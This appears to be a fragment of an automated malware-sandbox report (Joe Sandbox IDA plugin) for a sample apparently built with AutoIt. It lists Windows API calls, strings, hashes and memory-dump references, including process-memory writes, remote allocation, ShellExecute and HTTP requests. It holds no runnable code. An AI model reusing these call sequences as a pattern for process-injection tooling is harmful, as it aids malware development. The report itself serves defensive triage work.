                                                            • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00434598
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                            • Sleep.KERNEL32(00000000), ref: 004345D4
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                            • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                            • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                            • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                            • MessageBeep.USER32(00000000), ref: 00460C46
                                                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                            • EndDialog.USER32(?,00000001), ref: 00460C83
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                            • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                            • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                            • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                            • String ID:
                                                            • API String ID: 4023252218-0
                                                            • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                            • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                            • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                            • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                            APIs
                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                            • String ID:
                                                            • API String ID: 1489400265-0
                                                            • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                            • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                            • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                            • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                            APIs
                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                            • DestroyWindow.USER32(?), ref: 00455728
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                            • String ID:
                                                            • API String ID: 1042038666-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041780F
                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                            • __getptd.LIBCMT ref: 00417826
                                                            • __amsg_exit.LIBCMT ref: 00417834
                                                            • __lock.LIBCMT ref: 00417844
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            APIs
                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                            Similarity
                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                            • String ID:
                                                            • API String ID: 2403457894-0
                                                            APIs
                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                            • __freefls@4.LIBCMT ref: 00415209
                                                            Similarity
                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                            • String ID:
                                                            • API String ID: 4247068974-0
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5$8$^
                                                            • API String ID: 0-3622883839
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )$U$\
                                                            • API String ID: 0-3705770531
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 0046E505
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                            • CoUninitialize.OLE32 ref: 0046E53D
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                            Similarity
                                                            • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 708495834-557222456
                                                            APIs
                                                              • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                              • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                              • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                              • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                              • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                            Strings
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                            • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                            • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                            • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \$]$h
                                                            • API String ID: 4104443479-3262404753
                                                            • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                            • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                            • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                            • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                            APIs
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • CloseHandle.KERNEL32(?), ref: 00457E09
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                            • String ID: <$@
                                                            • API String ID: 2417854910-1426351568
                                                            • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                            • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                            • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                            • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3705125965-3916222277
                                                            • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                            • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                            • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                            • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                            APIs
                                                            • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                            • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: 0
                                                            • API String ID: 135850232-4108050209
                                                            • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                            • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                            • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                            • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                            • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                            • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                            • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                            • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: AU3_GetPluginDetails
                                                            • API String ID: 145871493-4132174516
                                                            • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                            • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                            • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                            • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                            • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                            • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                            • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 3375834691-2298589950
                                                            • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                            • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                            • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                            • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: $<
                                                            • API String ID: 4104443479-428540627
                                                            • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                            • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
